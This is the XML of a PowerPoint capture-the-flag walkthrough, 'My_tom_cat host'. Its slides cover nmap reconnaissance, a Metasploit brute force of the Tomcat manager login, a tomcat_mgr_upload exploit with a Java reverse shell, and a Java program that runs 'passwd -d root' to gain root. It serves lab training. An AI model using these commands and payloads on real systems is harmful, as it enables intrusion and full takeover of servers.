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" y="0"/>
            <a:ext cx="24384000" cy="1371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615740" y="2535460"/>
            <a:ext cx="19152524" cy="86159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895602" y="2823230"/>
            <a:ext cx="18592800" cy="806954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0271760" y="2535460"/>
            <a:ext cx="3840480" cy="1463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0500360" y="2535461"/>
            <a:ext cx="3383280" cy="129059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3416" y="4182526"/>
            <a:ext cx="18137172" cy="51816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4400" b="0" kern="1200" cap="all" spc="-2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9364125"/>
            <a:ext cx="18141696" cy="91440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160" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3200"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1828800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="32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0637520" y="2682511"/>
            <a:ext cx="3108960" cy="1054426"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr sz="26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907792" y="10424160"/>
            <a:ext cx="11811000" cy="45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7213839" y="10424160"/>
            <a:ext cx="4223762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6B4A9-1611-4792-9094-5F34BCA07E0B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83200" y="1524000"/>
            <a:ext cx="4724400" cy="1051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524000"/>
            <a:ext cx="16154400" cy="1051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5379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g"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="13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47915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72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267707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Image"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="14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1056335080_2112X2816.jpg"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" idx="15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724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2615740" y="2535460"/>
            <a:ext cx="19152524" cy="86159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895602" y="2823230"/>
            <a:ext cx="18592800" cy="806954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0271760" y="2535460"/>
            <a:ext cx="3840480" cy="1463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10500360" y="2535461"/>
            <a:ext cx="3383280" cy="129059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246" y="4188618"/>
            <a:ext cx="18141696" cy="517550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4400" b="0" kern="1200" cap="all" spc="-2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248" y="9364124"/>
            <a:ext cx="18141696" cy="9144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5267326" algn="l"/>
              </a:tabLst>
              <a:defRPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/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43616" y="2689004"/>
            <a:ext cx="3108960" cy="1060704"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr lang="en-US" sz="26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7792" y="10424160"/>
            <a:ext cx="11814048" cy="45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09008" y="10424160"/>
            <a:ext cx="4224528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4206240"/>
            <a:ext cx="9509760" cy="749808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0640" y="4206240"/>
            <a:ext cx="9509760" cy="749808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12588-04B1-427B-82EE-E8DB90309F0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696" y="4148668"/>
            <a:ext cx="9509760" cy="12801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0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" indent="0">
              <a:buNone/>
              <a:defRPr sz="36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696" y="5511796"/>
            <a:ext cx="9509760" cy="640080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46736" y="4148668"/>
            <a:ext cx="9509760" cy="12801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0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" indent="0">
              <a:buNone/>
              <a:defRPr sz="36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46736" y="5513162"/>
            <a:ext cx="9509760" cy="640080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9387" y="475488"/>
            <a:ext cx="17266162" cy="12765024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743712" y="749808"/>
            <a:ext cx="16706088" cy="122163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8040772" y="475488"/>
            <a:ext cx="5852160" cy="12765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800" y="1214784"/>
            <a:ext cx="4861560" cy="3291840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b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1409700"/>
            <a:ext cx="15125700" cy="1028700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2800" y="4572000"/>
            <a:ext cx="4861560" cy="70104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600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="280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78316" y="12429070"/>
            <a:ext cx="10369296" cy="51206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15092" y="749808"/>
            <a:ext cx="5303520" cy="122163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4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040772" y="475488"/>
            <a:ext cx="5852160" cy="12765024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315092" y="749808"/>
            <a:ext cx="5303520" cy="122163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800" y="1207008"/>
            <a:ext cx="4864608" cy="3291840"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5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8" y="475488"/>
            <a:ext cx="17202152" cy="12765024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2800" y="4572000"/>
            <a:ext cx="4864608" cy="70043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600"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx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828800" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr lang="en-US" sz="2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9392" y="475488"/>
            <a:ext cx="23445216" cy="12765024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743712" y="749808"/>
            <a:ext cx="22896576" cy="122163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3600" y="1285188"/>
            <a:ext cx="20116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206240"/>
            <a:ext cx="20116800" cy="786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8928" y="12429070"/>
            <a:ext cx="5486400" cy="512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0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9920" y="12429070"/>
            <a:ext cx="10424160" cy="512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97070" y="12429070"/>
            <a:ext cx="2926080" cy="512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2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96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365760" indent="-365760" algn="l" defTabSz="18288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6576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indent="-36576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36576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indent="-36576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00" indent="-45720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6pPr>
      <a:lvl7pPr marL="3800000" indent="-45720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7pPr>
      <a:lvl8pPr marL="4400000" indent="-45720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8pPr>
      <a:lvl9pPr marL="5000000" indent="-457200" algn="l" defTabSz="18288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y_tom_cat host"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089149" y="4544483"/>
            <a:ext cx="20205701" cy="3911601"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>My_tom_cat host</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="Capture the flag:"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2089149" y="2349018"/>
            <a:ext cx="20205701" cy="1614555"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Capture the flag:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="By:…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18860227" y="6918420"/>
            <a:ext cx="3604879" cy="124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900" spc="29" baseline="-3448">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>By:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr sz="2900" spc="29" baseline="-3448">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kuladeep Mantri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ave it as exploitt.java…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="6246569"/>
            <a:ext cx="7835743" cy="56174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370331">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="3888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Save it as exploitt.java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Move the file to apache2 folder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mv exploitt.java /var/www/html/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service apache2 start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now go to Metasploit terminal where we opened the command shell of tomcat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go to tmp folder </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="370331">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:defRPr sz="2916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bash-4.2$ cd tmp/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Phase-7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="3036408"/>
            <a:ext cx="7835743" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Phase-7</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="212" name="imagec.png" descr="imagec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406471" y="4429384"/>
            <a:ext cx="14170637" cy="48572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d.png" descr="imaged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r="53403"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="358558" y="6019091"/>
            <a:ext cx="10285976" cy="4047026"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="215" name="imagee.png" descr="imagee.png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53060"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="12989815" y="4398015"/>
            <a:ext cx="10285848" cy="7289210"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Removing password for user root and…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="474085" y="4035242"/>
            <a:ext cx="7499992" cy="1664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Removing password for user root and </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a: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gaining root access : </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="“Capturing the flag” proof.txt :"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13074259" y="3389386"/>
            <a:ext cx="605106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“Capturing the flag” proof.txt :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rying to find the IP Address via netdiscover and to find open ports and services, we used nmap -A &lt;ip&gt;."/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="8370130" cy="3848101"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr sz="3400"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Trying to find the IP Address via netdiscover and to find open ports and services, we used nmap -A &lt;ip&gt;.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Phase-1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="8370129" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Phase-1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="image8.png" descr="image8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0144886" y="2350496"/>
            <a:ext cx="13432222" cy="90150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e found two open ports…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="7788758" cy="38481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 defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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found two open ports</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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a. SSH at port 22/tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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b. HTTP at port 8080/tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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Then we opened the HTTP in the browser.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="phase-2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="7788757" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>phase-2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="image9.png" descr="image9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9974678" y="2058324"/>
            <a:ext cx="13602430" cy="95993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o find the credentials of Tomcat Manager Webapp we used Metasploit and do a brute-force attack.…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088436" y="3421130"/>
            <a:ext cx="20207128" cy="8776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 find the credentials of Tomcat Manager Webapp we used Metasploit and do a brute-force attack.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1 - Turn on Postgresql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service postgresql start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2 - Open Metasploit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root@kali:/home/kali# msfconsole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3 -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search tomcat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4 –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use auxiliary/scanner/http/tomcat_mgr_login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5 –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set rhosts 192.168.0.12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rhosts =&gt; 192.168.0.1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set rport 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rport =&gt; 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auxiliary(scanner/http/tomcat_mgr_login) &gt; run</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="193" name="Phase-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Phase-3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e found [+] 192.168.0.12:8080 - Login Successful: tomcat:tomcat…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1340203" y="2228694"/>
            <a:ext cx="7881265" cy="9258612"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle/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 found </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="36598"/>
                    <a:lumOff val="-17227"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>[+] 192.168.0.12:8080 - Login Successful: tomcat:tomcat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username – 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password – tomcat</a:t>
            </a:r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457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc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Then open </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:satOff val="36598"/>
                    <a:lumOff val="-17227"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.0.12:8080/manager/html</a:t>
            </a:r>
            <a:r>
              <a:t> using credentials we found above.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="196" name="imagea.png" descr="imagea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04" r="404"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10091389" y="1906563"/>
            <a:ext cx="13872294" cy="99028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aining access using metasploit:…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082800" y="3079036"/>
            <a:ext cx="20207127" cy="8501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79475">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="3984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Gaining access using metasploit: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Open msfconsole in terminal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search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&gt; use exploit/multi/http/tomcat_mgr_upload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rhost 192.168.0.12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rhost =&gt; 192.168.0.12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rport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rport =&gt;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payload java/shell_reverse_tcp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payload =&gt; java/shell_reverse_tcp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HttpUsername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HttpUsername =&gt;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HttpPassword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HttpPassword =&gt; tomcat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lhost 192.168.0.11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lhost =&gt; 192.168.0.11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set lport 8080</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="379475">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2988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lport =&gt; 8080</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="199" name="Phase-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Phase-4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sf5 exploit(multi/http/tomcat_mgr_upload) &gt; exploit…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2088436" y="3716970"/>
            <a:ext cx="20207128" cy="628206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msf5 exploit(multi/http/tomcat_mgr_upload) &gt; exploit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Started reverse TCP handler on 192.168.0.11:8080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Retrieving session ID and CSRF token...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Uploading and deploying u0hO...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Executing u0hO...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Undeploying u0hO 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400" b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[*] Command shell session 1 opened (192.168.0.11:8080 -&gt; 192.168.0.12:58154) at 2020-05-20 05:29:31 -0400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ned bash using…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1269999" y="8015916"/>
            <a:ext cx="9065949" cy="3848101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7916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr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Opened bash using </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="457200">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:defRPr b="0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python -c 'import pty; pty.spawn("/bin/bash")'</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Phase-5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270000" y="4925417"/>
            <a:ext cx="7757403" cy="2933701"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:t>Phase-5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="imageb.png" descr="imageb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r="8070"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11191598" y="4275212"/>
            <a:ext cx="12385510" cy="51655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reate a java exploit file in home directory…"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2082800" y="3079036"/>
            <a:ext cx="20207127" cy="89281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390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 a java exploit file in home directory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import java.io.BufferedReader;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import java.io.InputStreamReader;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public class exploitt {  //you have to change thew class same as file name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public static void main(String args[]) {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String s;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Process p;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try {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 = Runtime.getRuntime().exec("passwd -d root");  //the command you want to execute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BufferedReader br = new BufferedReader(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new InputStreamReader(p.getInputStream()));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while ((s = br.readLine()) != null)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    System.out.println("line: " + s);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p.waitFor();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System.out.println ("exit: " + p.exitValue());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    p.destroy();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    } catch (Exception e) {}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   }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="425195">
              <a:lnSpc>
                <a:spcPct val="107916"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2046" spc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}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="208" name="Phase-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Phase-6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36" normalizeH="0" baseline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732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Helvetica Neue</vt:lpstr>
      <vt:lpstr>Savon</vt:lpstr>
      <vt:lpstr>My_tom_cat host</vt:lpstr>
      <vt:lpstr>Phase-1</vt:lpstr>
      <vt:lpstr>phase-2</vt:lpstr>
      <vt:lpstr>Phase-3</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Phase-4</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Phase-5</vt:lpstr>
      <vt:lpstr>Phase-6</vt:lpstr>
      <vt:lpstr>Phase-7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My_tom_cat host</dc:title>
  <cp:lastModifiedBy>Kuladeep Mantri</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-05-26T10:24:06Z</dcterms:modified>
</cp:coreProperties>
</file>